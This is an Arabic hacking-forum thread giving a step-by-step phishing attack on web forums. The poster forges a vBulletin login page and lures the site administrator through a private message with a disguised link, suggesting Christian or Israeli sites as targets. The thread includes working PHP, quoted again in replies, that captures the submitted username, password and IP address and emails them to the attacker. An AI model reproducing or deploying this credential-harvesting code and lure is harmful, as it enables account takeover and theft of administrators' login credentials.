الموضوع: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة
عرض مشاركة واحدة
#1  
قديم 05-23-2015, 01:17 PM
عاطل بدرجة الزحف غير متواجد حالياً
    Male
لوني المفضل Slategray
 رقم العضوية : 775
 تاريخ التسجيل : 27-01-2015
 فترة الأقامة : 3795 يوم
 أخر زيارة : 05-03-2017 (06:01 AM)
 العمر : 28
 الإقامة : المدينه المنوره
 المشاركات : 1,253 [ + ]
 التقييم : 10
 معدل التقييم : عاطل بدرجة الزحف is on a distinguished road
بيانات اضافيه [ + ]
افتراضي اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة


السلام عليكم ورحمة الله وبركاته

الموضوع اهداء الى المشككين اني هكر ولا هاذه الموضوع هو الاثبات


انا ما اضر انفع المسلمينبين خطين



السلام عليكم ورحمة الله وبركاته

كيفكم شباب ؟

ان شاء الله طيبين

طبعا في كثير من المواقع لمن تجي تستهدفها ماتحصل ثغرات
تخمن على الوردبريس + جوميلا وماتطلع بنتيجة

انا بأعطيكم الفكرة والباقي عليكم


المتطلبات

1/ منتدى على سيرفر الهدف

====================

اول شئ تدخل على المنتدى وتزور صفحة الدخول
كيف تزورها تابع الشرح اللي في الفديو


طيب زورت الصفحة وكل شئ ايش بتسوي

تروح لمدير المنتدى وترسلو رسالة خاصه وبحركة فنية بسيطه تلغم رابط موضوع


كيف تلغمو تاخذ رابط اي موضوع

كسبيل مثال هذا

تصميم فلاشي ^_^ - مجتمع الفرسان

تقوم تعدل على الرابط
بزيادة رقمين
http://www.x6x.net/vb/showthread.php?t=1790505
علشان لمن ينسخ الرابط يعطيه خطا

وتقوم تسوي ارتباط تشعبي
عن طريق الايقونه هذه


تضغط وبتحط رابط الصفحة المزوره

طبعا الرساله الخاصه لمن ترسلها للمدير على حسب الموقع
مثلا
تقول
في موضوع في المنتدى يدعو الى الاسلام نرجو حذف الموضوع << طبعا لمن يكون الموقع مسيحي او اسرائيلي

ترجم قوقل يامعلم وارسل

طبعا راح ارفقلكم في الموضوع

كود التغليم اللي في الفديو

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>




تابع وبتركيز

تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>






فترة الأقامة : 23 يوم معدل التقييم : زيارات الملف الشخصي : 9
إحصائية مشاركات » xjava المواضيـعالــــــردود [+] [+] بمـــعــدل : 0.30 يوميا
xjavaمشاهدة ملفه الشخصيإرسال رسالة خاصة إلى xjavaالبحث عن كل مشاركات xjavaإضافة xjava إلى الإتصالات الخاصة بك
04-30-2015, 01:01 PM #3
الهيكل العظمي
.: HaCkErs x6x :.

::.KAREEM HACK ::.




بيانات اضافيه [ + ] رقم العضوية : 176477 تاريخ التسجيل : 13-08-2014 أخر زيارة : اليوم (12:23 PM) المشاركات : 846 [ + ] التقييم : 18632 الدولهـ


3270

رد: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة هع


اقتباس:
المشاركة الأصلية كتبت بواسطة xjava
تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>











توقيع : عاطل بدرجة الزحف





القَلْب الذِي يُسَامِح كَثيراً ، مِنْ الصَعْب أنْ يَقْسُوا !

رد مع اقتباس